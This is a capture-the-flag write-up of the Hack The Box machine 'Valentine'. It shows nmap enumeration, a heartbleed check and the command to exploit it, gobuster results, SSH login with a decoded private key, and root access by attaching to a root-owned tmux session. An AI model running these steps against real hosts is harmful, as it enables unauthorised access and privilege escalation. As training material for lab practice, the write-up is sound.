Summary

Valentine is an easy Linux box that can be exploited by enumerating the HTTP(S)-service properly and identifying that the host is vulnerable to heartbleed. By exploiting heartbleed you can gain a Base64-encoded password that can be used in combination with a private key file to gain an initial foothold on Valentine. The PrivEsc is done by exploiting Tmux running as root.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.1.190

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

My automated nmap script discovered a potential vulnerability for heartbleed. To obtain more accurate information whether or not this vulnerability is present on the system, the following Nmap scan was executed:

nmap --script=ssl-heartbleed -p 443  10.129.1.190
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-10 19:39 CET
Nmap scan report for 10.129.1.190
Host is up (0.012s latency).

PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High

Indeed, Nmap indicated the system is vulnerable to Heartbleed.


Exploitation

In order to exploit this, this Python script was used. The script can be executed as follows: python2.7 heartbleed.py -n 10 10.129.1.190 -v
It is worth mentioning that it may be necessary to execute several times. For me, I instantly got the an encoded string as shown below:

By this time, Gobuster has finished running as well and discovered the following files/directories:

===============================================================
2021/02/10 19:36:34 Starting gobuster
===============================================================
http://10.129.1.190/dev (Status: 301)
http://10.129.1.190/index (Status: 200)
http://10.129.1.190/encode.php (Status: 200)
http://10.129.1.190/decode.php (Status: 200)
http://10.129.1.190/omg (Status: 200)
http://10.129.1.190/server-status (Status: 403)

When navigating to decode.php, the string that was obtained from exploiting the heartbleed vulnerability, was entered:

It was attempted to authenticate with these credentials over SSH as the user Hype but this was unsuccessful. When navigating to the first dev location, the following directory listing was shown:

The hype_key contains a large hex encoded output. This was decoded as shown below:

It contains a RSA private key. The following command was used to re-authenticate over SSH and use this newly obtained private key:


Privilege Escalation

I always like to start by running Linpeas. It discovered the following:

This colour coding indicates a vulnerability that can most likely be exploited. Let’s navigate to this file:

The user Hype does not have permissions to change or read this file so let’s try to run it:
/usr/bin/tmux -S dev_sess
This will instantly provide a root shell in a new Tmux-window.

root@Valentine:/.devs# whoami && hostname
root
Valentine

Conclusion

This was a very easy box and I like the heartbleed vulnerability for Valentines :) By running automated enumeration scripts and identifying the heartbleed vulnerability it was relatively straightforward that the string should be decoded. The hype_key also was quite obviously a file that needed to be converted from hex to text and this was very straightforward. The privesc was really easy and can be found by utilising automated scripts such as Linpeas. I enjoyed this easy box. Hope you enjoyed this writeup!